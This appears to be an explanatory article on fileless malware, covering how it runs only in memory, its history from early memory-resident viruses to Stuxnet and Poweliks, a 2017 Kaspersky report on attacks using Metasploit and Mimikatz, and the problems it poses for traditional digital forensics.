Fileless malware is a type of malicious software that resides only in the memory-based RAM of a computer.
Very effective against existing anti-computer forensic strategies that incorporate file-based whitelisting, signature detection, hardware verification, pattern analysis, timestamping, etc., it leaves little usable evidence when conducting digital forensic investigations to identify unauthorized activity. It leaves very little evidence that can be used in a digital forensic investigation to identify unauthorized activity.
The main feature of this type of malware is that it is designed to run in memory, so its duration on the system is until the system is rebooted.
Difference between fileless malware and in-memory malware
Fileless malware is sometimes defined as synonymous with in-memory malware. However, while both types of malware have the same operating execution environment, running in system memory, the critical difference is the way in which the infection is initiated and spread.
The infection path of most malware, including in-memory malware, requires writing to the hard disk in order to execute.
However, it is necessary to access the hard disk of the host system in some way. This means that even if the most stealthy anti-forensic methods are employed, some form of residue of unauthorized access will remain on the host media.
Fileless malware, on the other hand, does not write its contents to disk from the time of infection until the process is terminated (usually by rebooting the system). This is achieved by residing in a volatile system area such as the system registry, in-memory process service area, etc.
Fileless malware has become an evolutionary malicious software that steadily improves and enhances itself to achieve clearly defined attack scenarios.
The roots of this are in memory-resident virus programs that, once started, reside in memory waiting for a system interrupt before accessing the control flow, as seen in viruses such as Frodo, The Dark Avenger, and Number of the Beast. This is said to be the origin of fileless malware.
These techniques have evolved into temporary memory-resident viruses, famous examples being Anthrax, Monxla, and others. They have also been given a more truly “fileless” nature by in-memory injected network viruses/worms such as CodeRed and Slammer.
More modern evolutions have also been seen in viruses such as Stuxnet, Duqu, Poweliks, and Phasebot.
On February 8, 2017, Kaspersky Lab’s Global Research and Analysis team published a report titled “Fileless attacks against Enterprise networks”.
This report suggests that this kind of malware variants and its latest forms are affecting 140 corporate networks worldwide, mainly banks, telecom companies and government agencies.
In this report, a fileless malware variant uses a PowerShell script (a feature located in the Microsoft Windows registry system) to attack target machines using a common attack framework called Metasploit and supporting attack tools such as Mimikatz
This article details how the attacker used a common attack framework called “Metasploit” and supporting attack tools such as “Mimikatz” to attack the target machine and used standard Windows utilities such as “SC” and “NETSH” to assist in the lateral movement.
This malware was first detected by identifying the Metasploit Meterpreter code running in physical memory on a Central Domain Controller (DC).
By the way, Kaspersky Lab is not the only one, most of the major IT security and anti-malware companies such as Symantec, Trend Micro, McAfee Labs and Cybereason have published similar findings.
The emergence of file-less malware has become a major challenge for digital forensic investigations.
Because for digital forensic investigations, the ability to obtain electronic residue from the crime scene is essential to securing chain of custody and producing evidence that is admissible in court.
It’s difficult to think of standard operating procedures for digital forensic investigations and how computers should be handled at crime scenes
In traditional forensic investigation methods, forensic teams conduct their investigations based on the following rules.
- Don’t turn on your computer under any circumstances
- Make sure your computer is turned off. Some screen savers make it appear that the computer is turned off, but the operating lights on the hard drive or monitor may indicate that the machine is on.
- Disconnect the main power battery from the laptop.
- Unplug power supplies and other devices from sockets on the computer itself
This is how fileless malware does not fit into these forensic flows.
This is because evidence is only obtained for memory images obtained from the actual running system under investigation.
If traditional forensic investigations were conducted against fileless malware, memory would be volatile, legal substantiation would be compromised, and the weight of evidence presented would be reduced, increasing the likelihood that Trojan horses and the “someone else did it” defense would be used more effectively.
The inability of standard forensic investigation techniques to cope with this type of malware makes it very attractive to adversaries who want to gain a foothold in the network, perform lateral movements that are difficult to track (lateral movement), and do so quickly and quietly.